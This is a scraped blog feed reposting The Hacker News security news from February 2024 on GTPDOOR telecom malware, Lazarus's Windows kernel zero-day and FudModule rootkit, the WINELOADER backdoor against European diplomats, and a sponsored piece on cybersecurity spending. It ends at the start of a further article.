Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/new-silver-saml-attack-evades-golden.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-8832559710186490782024-02-29T04:19:00.001-08:002024-02-29T04:19:40.719-08:00GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTcstZ3eEXyhwh9wRQrwbiEGeU63Wo6SP50lMzKOz2U1A-iPfBOL9sDEDPoziL-2KnJHTN9G8Q7bFU4nZhuRmmrt7YAxPe5QD874jfZhhmXSi1fg3Fx1bPlU66vARjyGhXn6RUUIrAb4/s1600/h118.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTcstZ3eEXyhwh9wRQrwbiEGeU63Wo6SP50lMzKOz2U1A-iPfBOL9sDEDPoziL-2KnJHTN9G8Q7bFU4nZhuRmmrt7YAxPe5QD874jfZhhmXSi1fg3Fx1bPlU66vARjyGhXn6RUUIrAb4/s1600/h118.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZCZvSbOtGh_UAiA2QCc7XXmNM_EPYN0XjG79ufcTcfp1z5o0Rs4fFpU-OvJwKfxxG45Zox_vw36AXqBZwOAonmZFLNhHZqIbsez9XS4TNGgfr1iN943UTybupWK2bhHerleeHMe6Kknzy9DVBLDUCEG-jN2SeNYYTrMbjGDz9lSB76zOUH9cDZP6Y5vz/s728-rw-e365/telecom.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="GTPDOOR Linux Malware" border="0" data-original-height="380" data-original-width="728" 
data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZCZvSbOtGh_UAiA2QCc7XXmNM_EPYN0XjG79ufcTcfp1z5o0Rs4fFpU-OvJwKfxxG45Zox_vw36AXqBZwOAonmZFLNhHZqIbsez9XS4TNGgfr1iN943UTybupWK2bhHerleeHMe6Kknzy9DVBLDUCEG-jN2SeNYYTrMbjGDz9lSB76zOUH9cDZP6Y5vz/s728-rw-e365/telecom.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="GTPDOOR Linux Malware"/></a></div> <p>Threat hunters have discovered a new Linux malware called <strong>GTPDOOR</strong> that's designed to be deployed in telecom networks that are adjacent to GPRS roaming exchanges (<a href="https://en.wikipedia.org/wiki/GPRS_roaming_exchange" rel="nofollow" target="_blank">GRX</a>)</p><a name='more'></a> <p>The <a href="https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR" rel="nofollow" target="_blank">malware</a> is novel in the fact that it leverages the GPRS Tunnelling Protocol (<a href="https://en.wikipedia.org/wiki/GPRS_Tunnelling_Protocol" rel="nofollow" target="_blank">GTP</a>) for command-and-control (C2) communications.</p> <p>GPRS roaming allows subscribers to access their GPRS services while they are beyond the reach of their home mobile network. 
This is facilitated by means of a GRX that transports the roaming traffic using GTP between the visited and the home Public Land Mobile Network (<a href="https://en.wikipedia.org/wiki/Public_land_mobile_network" rel="nofollow" target="_blank">PLMN</a>).</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>Security researcher haxrob, who discovered two <a href="https://www.virustotal.com/gui/file/827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161" rel="nofollow" target="_blank">GTPDOOR</a> <a href="https://www.virustotal.com/gui/file/5cbafa2d562be0f5fa690f8d551cdb0bee9fc299959b749b99d44ae3fda782e4" rel="nofollow" target="_blank">artifacts</a> uploaded to VirusTotal from China and Italy, said the backdoor is likely linked to a known threat actor tracked as <a href="https://thehackernews.com/2021/10/lightbasin-hackers-breach-at-least-13.html" rel="nofollow" target="_blank">LightBasin</a> (aka UNC1945), which was previously disclosed by CrowdStrike in October 2021 in connection with a series of attacks targeting the telecom sector to steal subscriber information and call metadata.</p> <div class="separator" style="clear: both;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnJHK7M9RFkyFZJrr4AS3E7JpzBHud-jShW9NLdLY01O2s8jtbxtIoeUTfWsxfROsGPwoLXD3c1yd7x6fDxvWVnBXmaunB642-mn9lpk8IXtunDmve9BnaH0IzmTC_DWCVHHGbq8Un8MzriZ_8qQq4WAn7ww44zcGOXuokw0GPPxPy1dX15CBH7VjVFDm9/s728-rw-e365/linux.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="GTPDOOR Linux Malware" border="0" data-original-height="253" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnJHK7M9RFkyFZJrr4AS3E7JpzBHud-jShW9NLdLY01O2s8jtbxtIoeUTfWsxfROsGPwoLXD3c1yd7x6fDxvWVnBXmaunB642-mn9lpk8IXtunDmve9BnaH0IzmTC_DWCVHHGbq8Un8MzriZ_8qQq4WAn7ww44zcGOXuokw0GPPxPy1dX15CBH7VjVFDm9/s728-rw-e365/linux.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="GTPDOOR Linux Malware"/></a></div> <p>"When run, the first thing GTPDOOR does is process-name stomps itself – changing its process name to '[syslog]' – disguised as syslog invoked from the kernel," the researcher said. 
"It suppresses child signals and then opens a raw socket [that] will allow the implant to receive UDP messages that hit the network interfaces."</p> <p>Put differently, GTPDOOR allows a threat actor that already has established persistence on the roaming exchange network to contact a compromised host by sending GTP-C Echo Request messages with a malicious payload.</p> <p>This magic GTP-C Echo Request message acts as a conduit to transmit a command to be executed on the infected machine and return the results back to the remote host.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>GTPDOOR "Can be covertly probed from an external network to elicit a response by sending a TCP packet to any port number," the researcher noted. "If the implant is active a crafted empty TCP packet is returned along with information if the destination port was open/responding on the host."</p> <p>"This implant looks like it is designed to sit on compromised hosts that directly touch the GRX network – these are the systems that communicate to other telecommunication operator networks via the GRX."</p> <div count="4" id="trim-sidebar"></div> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? 
Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/gtpdoor-linux-malware-targets-telecoms.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-50773695012970420492024-02-29T04:14:00.001-08:002024-02-29T04:14:52.714-08:00How To Prioritize Cybersecurity Spending: A Risk-Based Strategy For The Highest ROI<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Z4My6Ph03o7WzvIsEP2UaZZwPyozSUUSRlLrrJ42CtiIkMH2vPLKx3CC2Fqtt2bvbUjDx7KB2PP8dU2TDnQiugNz0iKu5xjbK2pILpEWrdgKeh8V5xT8OW5xLuOvBQthhB9vMi77tE8/s1600/h132.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Z4My6Ph03o7WzvIsEP2UaZZwPyozSUUSRlLrrJ42CtiIkMH2vPLKx3CC2Fqtt2bvbUjDx7KB2PP8dU2TDnQiugNz0iKu5xjbK2pILpEWrdgKeh8V5xT8OW5xLuOvBQthhB9vMi77tE8/s1600/h132.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx6cLLRZYUdyF4Dnf1amlfa1G46ydHBiTWhI9yV87d4ARWXvZez8qO6eAwr02DWcjB9cVWoli8jb56rXNm4eSLjqjjD4KIAKPAnh9-qFBZgAwKhm19FK1i3m_6_96_rQ4Pr0RdEzNKhU0Q_ONyYhvu7CMPTAx1J-MrqGPyZtgnOrq3XRN__0iChMnedXk/s728-rw-e365/lock.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Cybersecurity" border="0" data-original-height="380" data-original-width="728" 
data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx6cLLRZYUdyF4Dnf1amlfa1G46ydHBiTWhI9yV87d4ARWXvZez8qO6eAwr02DWcjB9cVWoli8jb56rXNm4eSLjqjjD4KIAKPAnh9-qFBZgAwKhm19FK1i3m_6_96_rQ4Pr0RdEzNKhU0Q_ONyYhvu7CMPTAx1J-MrqGPyZtgnOrq3XRN__0iChMnedXk/s728-rw-e365/lock.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Cybersecurity"/></a></div> <p>As an IT leader, staying on top of the latest cybersecurity developments is essential to keeping your organization safe. But with threats coming from all around — and hackers dreaming up new exploits every day — how do you create proactive, agile cybersecurity strategies? And what cybersecurity approach gives you the most bang for your buck, mitigating your risks and maximizing the value of your cybersecurity investments?</p><a name='more'></a> <p>Let's take a closer look at the trends that are impacting organizations today, including the growing reach of data breaches and the increase in cybersecurity spending, and explore how you can get the most out of your cybersecurity resources, effectively securing your digital assets and maintaining your organization's integrity in the face of ever-evolving cyber threats.</p> <h2>Successful data breaches</h2> <p>In 2022, the number of people affected by data breaches increased significantly. 
According to the <a href="https://www.cnet.com/tech/services-and-software/data-breaches-hit-lots-more-people-in-2022/" rel="nofollow" target="_blank">Identity Theft Resource Center's 2022 Data Breach Report</a>, more than 1,800 data compromises were reported in 2022 — 60 fewer reports than in the previous year — but the number of people impacted by data breaches jumped by a whopping 40% to 422.1 million.</p> <p>And data breaches can cause real, long-lasting impacts, as proven by some of the most infamous data breaches in history:</p> <ul> <li>eBay: Hackers stole login credentials for just a few eBay employees and then pulled off a massive data breach that <a href="https://www.cnbc.com/2014/05/22/hackers-raid-ebay-in-historic-breach-access-145-mln-records.html" rel="nofollow" target="_blank">stole the personal information and passwords of more than 145 million users</a>. Experts believe that the hack had ramifications on users outside of eBay — as people tend to reuse passwords on multiple sites, there's a good chance that hackers were able to access other online services using the stolen credentials.</li> <li>Yahoo: In one of the biggest data breaches in history, <a href="https://www.cbsnews.com/news/yahoo-data-breach-117-5-million-settlement-reached/" rel="nofollow" target="_blank">Yahoo estimated that hackers had compromised over three billion accounts</a>. Although hackers didn't get passwords, they did gain access to users' security question answers, increasing the risk of identity theft. 
The company ultimately paid $35 million in regulatory fines and had to provide nearly 200 million people with credit monitoring services and other restitution valued at $117.5 million.</li> <li>Marriott: Hackers were able to spend nearly four years accessing Marriott's Starwood system, <a href="https://www.csoonline.com/article/567795/marriott-data-breach-faq-how-did-it-happen-and-what-was-the-impact.html" rel="nofollow" target="_blank">stealing data from more than 500 million hotel customers</a>. Cybercriminals stole everything from customer names and contact info to passport numbers, travel information, and financial information, including credit and debit card numbers and expiration dates. In addition to the massive blow to its reputation and loss of consumer trust, the company faced steep fines, including a £99 million fine from the UK Information Commissioner's Office (ICO) for violating British citizens' privacy rights under the GDPR.</li> </ul> <p>Given the escalating scope and impact of data breaches, it's clear that CISOs and IT teams have their work cut out for them to ensure their organization is prepared for anything. </p> <h2>Cyber spending trends</h2> <p>Unsurprisingly, with the growing cybersecurity problem, organizations are spending more money to bolster their cybersecurity resources. </p> <ul> <li>Tech research and advisory firm Gartner previously <a href="https://www.gartner.com/en/documents/4016190" rel="nofollow" target="_blank">estimated that the information security and risk management market will reach $172.5 billion in 2022</a>, and that the market will grow to $276.3 billion in 2026.</li> <li>Research firm Cybersecurity Ventures <a href="https://cybersecurityventures.com/stats/" rel="nofollow" target="_blank">forecasts that global spending on cybersecurity will cumulatively exceed $1.75 trillion</a> from 2021 to 2025. 
This is even more significant when you consider that in 2004, the cybersecurity market was valued at just $3.5 billion.</li> <li> IDC Data and Analytics <a href="https://www.cybersecuritydive.com/news/cybersecurity-spending-increase-idc/645338/" rel="nofollow" target="_blank">predicts that software spending will account for nearly half (47%) of all cybersecurity spending this year</a>, with services capturing 39% of expenditures and hardware accounting for 13%.</li> </ul> <h2>Getting the most from your cybersecurity resources</h2> <p>Clearly, there's no shortage of cybersecurity threats. So, how can an IT professional ensure they are maximizing the value of cybersecurity resources and getting every ounce of protection from cybersecurity investments? A risk-based approach, where you identify and prioritize your greatest vulnerabilities, and correlate threat exposure to business impact, will help protect organizations and optimize spending decisions. </p> <p>To adopt a risk-based approach, deploy the following strategies:</p> <ul> <li>Focus on your external attack surface. Your business' external attack surface includes all of your company's accessible digital assets — which present an enticing target for bad actors. You can't fix a problem if you don't know it exists; use a <a href="https://outpost24.com/products/external-attack-surface-management/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">proven external attack surface management (EASM) solution</a> to regularly scan and monitor your assets for potential security gaps. </li> <li>Prioritize protection of end user credentials. As eBay found, gaining access to just a handful of user credentials can effectively give hackers an open-door invite to your network and data. Ensure you provide employees with regular, ongoing security training to help them become more adept at identifying and appropriately responding to cyber risks. 
Deploy robust identity and access management protocols across your organization. And use a <a href="https://specopssoft.com/product/specops-password-auditor/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">password auditor</a> to ensure that your employees aren't using passwords that have already been breached or compromised. </li> <li>Prioritize vulnerability remediation across your networks and cloud services. Invest in a <a href="https://outpost24.com/products/risk-based-vulnerability-management/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">risk-based vulnerability management solution</a> that will help you prioritize threats based on the highest risks posed (based on likelihood and exploit availability), rather than wasting time and resources on vulnerabilities that pose little threat.</li> <li>Integrate a threat intelligence solution. To proactively adapt your organization's defenses against emerging threats and attack vectors, you should invest in a <a href="https://outpost24.com/products/cyber-threat-intelligence/?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=na_thehackernews&utm_content=guest-post" rel="nofollow" target="_blank">threat intelligence solution</a> that provides real-time insights into evolving threats to your organization and industry. By focusing your attention (and spending) on high-impact, likely-to-be-exploited vulnerabilities, you can strategically deploy resources to address your most pressing security concerns.</li> </ul> <h2>Prioritize a risk-based approach to boost cybersecurity ROI</h2> <p>Today's digital landscape requires IT pros to prioritize a risk-based approach to cybersecurity, ensuring that your investments address current and future threats. 
By strategically deploying your organization's resources — using robust solutions and focusing on high-impact vulnerabilities — you'll be taking steps to keep your organization safe, maintain your operational integrity, and boost your cybersecurity ROI.</p> <div class="cf note-b"><span class="">This article is a contributed piece from one of our valued partners.</span></div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/why-risk-based-approach-to.html" rel="nofollow" target="_blank">thehackernews.com</a><br/>Published 2024-02-29T04:08:00.001-08:00 (updated 2024-02-29T04:08:54.647-08:00): Lazarus Hackers Exploited Windows Kernel Flaw As Zero-Day In Recent Attacks<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisrskToitHG7n0s2enrcivue-oDauhlBJYY7fsZnbkBpQh_cugw4OVk_EYMlI4nN6R4m3Y8_N1fUBO8WLYVmjeVh8GUZkk03ajo73nlUxNmNeSFALcrpAaCXOwZllK2rWc4QXew1lC5DkmP9yY2OfLACu8t7Te_noxggC4HZJ85ZzE8EheoNVGOhOAHO0B/s728-rw-e365/windows-hacked.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Windows Kernel Flaw" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisrskToitHG7n0s2enrcivue-oDauhlBJYY7fsZnbkBpQh_cugw4OVk_EYMlI4nN6R4m3Y8_N1fUBO8WLYVmjeVh8GUZkk03ajo73nlUxNmNeSFALcrpAaCXOwZllK2rWc4QXew1lC5DkmP9yY2OfLACu8t7Te_noxggC4HZJ85ZzE8EheoNVGOhOAHO0B/s728-rw-e365/windows-hacked.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Windows Kernel Flaw"/></a></div> <p>The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.</p><a name='more'></a> <p>The vulnerability in question is <strong>CVE-2024-21338</strong> (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part of <a href="https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html" rel="nofollow" target="_blank">Patch Tuesday updates</a>.</p> <p>"To exploit this vulnerability, an attacker would first have to log on to the system," Microsoft <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" rel="nofollow" target="_blank">said</a>. 
"An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system."</p> <p>While there were no indications of active exploitation of CVE-2024-21338 at the time of the release of the updates, Redmond on Wednesday revised its "Exploitability assessment" for the flaw to "Exploitation Detected." 
</p> <p>Cybersecurity vendor Avast, which <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" rel="nofollow" target="_blank">discovered</a> an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."</p> <p>The FudModule rootkit was <a href="https://thehackernews.com/2022/10/hackers-exploiting-dell-driver.html" rel="nofollow" target="_blank">first reported</a> by ESET and AhnLab in October 2022 as capable of disabling the monitoring of all security solutions on infected hosts by means of what's called a Bring Your Own Vulnerable Driver (BYOVD) attack, wherein an attacker uses a driver susceptible to a known or zero-day flaw to escalate privileges.</p> <p>What makes the latest attack significant is that it goes "beyond BYOVD by exploiting a zero-day in a driver that's known to be already installed on the target machine." 
That susceptible driver is appid.sys, which is crucial to the functioning of a Windows component called <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker" rel="nofollow" target="_blank">AppLocker</a> that's responsible for application control.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSRunES18hts1BC1NThOE1i0E-srNQAtTg5lZ369tr5CvMn5O6RMKdKytxj5LpXVkMD6rIr71FhfnN5HcA-_I9zxXkOIGwC8bY8GvkUEJy4xr7AYD3JYX1Ttl0ciGiBFrchcCEeUjLmj7M7RrBVMAqeqZ8iJn1uVOePMBRlK-8gEhl2Z_9Qr1PNA6Lhy9_/s728-rw-e365/app.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Windows Kernel Flaw" border="0" data-original-height="476" data-original-width="1019" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSRunES18hts1BC1NThOE1i0E-srNQAtTg5lZ369tr5CvMn5O6RMKdKytxj5LpXVkMD6rIr71FhfnN5HcA-_I9zxXkOIGwC8bY8GvkUEJy4xr7AYD3JYX1Ttl0ciGiBFrchcCEeUjLmj7M7RrBVMAqeqZ8iJn1uVOePMBRlK-8gEhl2Z_9Qr1PNA6Lhy9_/s728-rw-e365/app.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Windows Kernel Flaw"/></a></div> <p>The real-world exploit devised by the Lazarus Group entails using CVE-2024-21338 in the appid.sys driver to execute arbitrary code in a manner that bypasses all security checks and runs the FudModule rootkit.</p> <p>"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances," security researcher Jan Vojtěšek said, describing the malware as under active development.</p> <p>Besides taking steps to sidestep detection by disabling system loggers, FudModule is engineered to turn off specific security software such as AhnLab V3 Endpoint 
Security, CrowdStrike Falcon, HitmanPro, and Microsoft Defender Antivirus (formerly Windows Defender).</p> <p>The development marks a new level of technical sophistication on the part of North Korean hacking groups, which continuously iterate their arsenal for improved stealth and functionality. It also illustrates the elaborate techniques employed to hinder detection and make their tracking much harder.</p> <p>The adversarial collective's <a href="https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html" rel="nofollow" target="_blank">cross-platform focus</a> is also exemplified by the fact that it has been <a href="https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/" rel="nofollow" target="_blank">observed</a> using bogus calendar meeting invite links to stealthily install malware on Apple macOS systems, a campaign that was <a href="https://thehackernews.com/2023/12/n-korean-kimsuky-targeting-south-korean.html" rel="nofollow" target="_blank">previously documented</a> by SlowMist in December 2023.</p> <p>"Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors," Vojtěšek said. 
"The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal."</p> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/lazarus-hackers-exploited-windows.html" rel="nofollow" target="_blank">thehackernews.com</a><br/>Published 2024-02-29T00:43:00.001-08:00 (updated 2024-02-29T00:43:20.020-08:00): New Backdoor Targeting European Officials Linked To Indian Diplomatic Events<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv97o8vYE-bCkTyewAfwFqbXiCjYGi5xgZFIUcejJ_po1BiM36fhNzLV3YGMtwpx2RWJ4OenARptW_EE9QXOrAANbn0mj0EHnoKC3UU9O7qiPHKGWkJpDvktX6gfXsQPzoNU1s5Ltxu5deZ4kxqNKQXC8mGfVlAdem0fvA_bGVEw3rLpLQNwvwjwe7loKG/s728-rw-e365/cyber.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img 
alt="Backdoor" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv97o8vYE-bCkTyewAfwFqbXiCjYGi5xgZFIUcejJ_po1BiM36fhNzLV3YGMtwpx2RWJ4OenARptW_EE9QXOrAANbn0mj0EHnoKC3UU9O7qiPHKGWkJpDvktX6gfXsQPzoNU1s5Ltxu5deZ4kxqNKQXC8mGfVlAdem0fvA_bGVEw3rLpLQNwvwjwe7loKG/s728-rw-e365/cyber.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Backdoor"/></a></div> <p>A previously undocumented threat actor dubbed <strong>SPIKEDWINE</strong> has been observed targeting officials in European countries with Indian diplomatic missions using a new backdoor called <b>WINELOADER</b>.</p> <p>The adversary, according to a <a href="https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" rel="nofollow" target="_blank">report</a> from Zscaler ThreatLabz, used a PDF file in emails that purported to come from the Ambassador of India, inviting diplomatic staff to a wine-tasting event on February 2, 2024.</p> <p>The <a href="https://www.virustotal.com/gui/file/3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9" rel="nofollow" target="_blank">PDF document</a> was uploaded to VirusTotal from Latvia on January 30, 2024. 
That said, there is evidence to suggest that this campaign may have been active at least since July 6, 2023, going by the discovery of <a href="https://www.virustotal.com/gui/file/ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7" rel="nofollow" target="_blank">another similar PDF file</a> uploaded from the same country.</p> <p>"The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command-and-control (C2) infrastructure," security researchers Sudeep Singh and Roy Tay said.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcsRm522CRdvtVfeBMgXbZhjht3DvrSEJFvk6H6RYkLexWqVbo5ENDvZ_XdVh7n-Q25dHmYFjvxvatKQsp1C0y5aCJGZ23gsc3ZeKMPKfSzdTdFVLKJmo3FHXEloYXYepGCF_ZhSe9KZY8-EzSL3DoegnRjizdjHNThsfiXG-1ZG1n2fv_qrvDx8KKbOY1/s728-rw-e365/payload.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Backdoor" border="0" data-original-height="469" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcsRm522CRdvtVfeBMgXbZhjht3DvrSEJFvk6H6RYkLexWqVbo5ENDvZ_XdVh7n-Q25dHmYFjvxvatKQsp1C0y5aCJGZ23gsc3ZeKMPKfSzdTdFVLKJmo3FHXEloYXYepGCF_ZhSe9KZY8-EzSL3DoegnRjizdjHNThsfiXG-1ZG1n2fv_qrvDx8KKbOY1/s728-rw-e365/payload.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Backdoor"/></a></div> <p>Central to the novel attack is the PDF file that comes embedded with a malicious link that masquerades as a questionnaire, urging the recipients to fill it out in order to participate. 
Clicking on the link paves the way for an HTML application ("wine.hta") that contains obfuscated JavaScript code to retrieve an encoded ZIP archive bearing WINELOADER from the same domain.</p> <p>The malware is packed with a core module that's designed to execute modules from the C2 server, inject itself into another dynamic-link library (DLL), and update the sleep interval between beacon requests.</p> <p>A notable aspect of the cyber incursions is the use of compromised websites for C2 and hosting intermediate payloads. It's suspected that the "C2 server only responds to specific types of requests at certain times," thereby making the attacks more evasive.</p> <p>"The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions," the researchers said.</p> <div class="cf note-b">
</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/new-backdoor-targeting-european.html" rel="nofollow" target="_blank">thehackernews.com</a><br/>Published 2024-02-29T00:37:00.001-08:00 (updated 2024-02-29T00:37:21.499-08:00): Lazarus Exploits Typos To Sneak PyPI Malware Into Dev Systems<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoOsvoEPlyoX-fS2syYNGtZUBYDatyFso4vFhczOLHv2RN26jv1aYHAlfM6N1GnfOWfmbARMQWwiU2gWQ_ckElD6-NNqTYUJaauHWhP4n0AeAyjKIyakYdSVFYoinbYDKsVdIazYQ6Dnz3crRqalSPwYylrYGrPlkmHHnJg1AmMA2iLtjEoGFNZ7EZUl9b/s728-rw-e365/dll.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="PyPI Malware" border="0" data-original-height="380" data-original-width="728"
